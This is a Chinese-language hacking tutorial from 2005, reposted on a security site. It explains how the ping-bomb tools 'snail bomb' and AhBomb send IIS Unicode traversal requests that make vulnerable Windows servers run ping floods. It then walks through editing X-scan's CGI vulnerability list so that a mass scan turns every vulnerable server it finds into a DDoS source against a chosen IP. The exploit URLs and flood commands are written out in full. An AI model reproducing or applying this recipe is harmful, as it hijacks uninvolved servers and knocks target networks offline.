欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

利用X-scan实现DDoS Ping攻击

来源:http://www.juntuan.net 作者:未知 时间:2005-03-04 TAG: 我要投稿
一、从这里说起、、

一开始的时候,不能不说说两款影响力很大的DDoS Ping炸弹工具。

一个是蜗牛炸弹,一个是AhBomb。

蜗牛炸弹出来的很早,通过实现搜索有漏洞的服务器做好储备,呵呵,需要的时候,通过

控制这些有漏洞的服务器集中 Ping 攻击目标机,导致目标网络速度变慢,达到DDoS攻击的目的。

AhBomb是bigball写的一款更强大的攻击工具,(呵呵,这里很感谢他送给我的无限制版)
[IMGA]http://www.patching.net/abu/gongfang/hacking/easyddosping/1.gif[/IMGA]
从本质上说,AhBomb的实现方法和蜗牛炸弹没有什么区别,但是由于程序编写的很优秀,多线程

部分写的特别完善,而且缺省的参数导致很可能会对被攻击者带来致命的打击。

呵呵

还是分析一下吧:

首先从蜗牛炸弹开始谈起

它有一个搜索的过程,搜索unicode漏洞的主机,然后将主机地址保存在Server.dll文件中

在需要实施攻击的时候,就调动所有的服务器进行攻击。

我对一个虚拟目标 200.200.200.200 这个ip进行攻击,却省配置下截获的数据包:
[IMGA]http://www.patching.net/abu/gongfang/hacking/easyddosping/2.gif[/IMGA]
前面的部分

Get /scripts/..%c1%1c../winnt/system32/cmd.exe?/c

是通过unicode编码调用Windows服务器的命令解释器去执行命令。

具体被执行的命令是:

ping -l 65000 -n 500 200.200.200.200

这里解释如下:

ping 一个发送测试数据包检测网络状况的命令

-l 64000 发送包含由64000字节数据量的 ECHO 数据包

-n 500 发送500遍 ECHO 请求数据包

200.200.200.200 目标ip,呵呵

现在看的很清楚了吧,也不用多说。

 

这些命令虽然简单,但由于ping命令的使用只需要最低限度的用户权限,而具有unicode漏洞的

机器又非常多,这才会导致大量的数据涌向一处。于是、、挂了。

 

 

我们来看看AhBomb做了些什么。
[IMGA]http://www.patching.net/abu/gongfang/hacking/easyddosping/3.gif[/IMGA]
前面的部分

Get /scripts/..%%255c..%255cwinnt/system32/cmd.exe?/c

是通过unicode编码调用Windows服务器的命令解释器去执行命令,比较新的编码所以找到的

漏洞服务器应该会更多。

具体被执行的命令是:

ping 192.168.0.1 -t -i 255

这里解释如下:

ping 一个发送测试数据包检测网络状况的命令

-t 不停的发送 ECHO 数据包,是的,不停

-i 255 TTL值设为255(最大)

192.168.0.1 目标,呵呵

 

仔细看看它的参数和蜗牛炸弹的不同,具体体现在它并没有发送大数据包,而仅仅是发送的

普通大小的包,因为很多网络设备会过滤大包,标准格式的反而才能真正被发送到目标。

 

这里附:(TTL:生存时间,指定数据报被路由器丢弃之前允许通过的网段数量。TTL 是由发送主机

设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器

至少将 TTL 减小 1。 )

 

 

二、一款经典的扫描工具X-scan

X-scan,安全焦点的又一力作,从一开始的构想,到现在的全开放式结构设计,这种执著的精神,

难道不正是我们所追求的么?、、、

重点从它的cgi扫描功能谈起

选中Tools中的CGI列表维护功能,可以看到其中列出了从Windows到各个版本Unix系统

可能存在的cgi漏洞的列表。

[IMGA]http://www.patching.net/abu/gongfang/hacking/easyddosping/4.gif[/IMGA]
它是如何验证服务器是否存在漏洞?

调用命令解释器,执行 dir 命令!

换一换你的思维模式,用一个hacker的思维模式去想

调用 dir 命令可以,我们为什么不能调用其他的命令呢?

呵呵

这就是我要说的重点了

如果我把

/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir

替换成

/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+192.168.0.1

、、、

ping -t -i 255 -w 5 192.168.0.1

为什么用这个命令?

为了不被网络设备过滤掉,所以不发送大数据包。

为了能够让我们的数据包达到目标,我们设置TTL值为255。

-w 5 参数,指定超时间隔为5毫秒,不管对方返回信息是什么,不停的发,呵呵,这对一些过滤ICMP包

的服务器还是很管用的。

我打开cgi.lst文件,手工编辑其中的内容

经过测试目前打了SP2以后仍然会有编码漏洞的就是 IIS-DECODE 二次编码漏洞了。

我保留了两个最有可能的方式库,整理如下:

测试的目标ip为:192.168.0.1

[IMGA]http://www.patching.net/abu/gongfang/hacking/easyddosping/5.gif[/IMGA]
打开Tools中的CGI列表维护选择新的修改后的列表
[IMGA]http://www.patching.net/abu/gongfang/hacking/easyddosping/6.gif[/IMGA]
到这里,我们只要通过X-scan去大规模的扫描cgi漏洞,就可以实施对目标服务器的DDoS Ping攻击了。

到最后,罗嗦一下,其实用任何一个平台下的cgi扫描工具,稍作修改,都可以实现我们的目的。

用X-scan做讲解是因为它的出色,以及它在扫描cgi漏洞的时候是支持代理服务器连接的。
【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载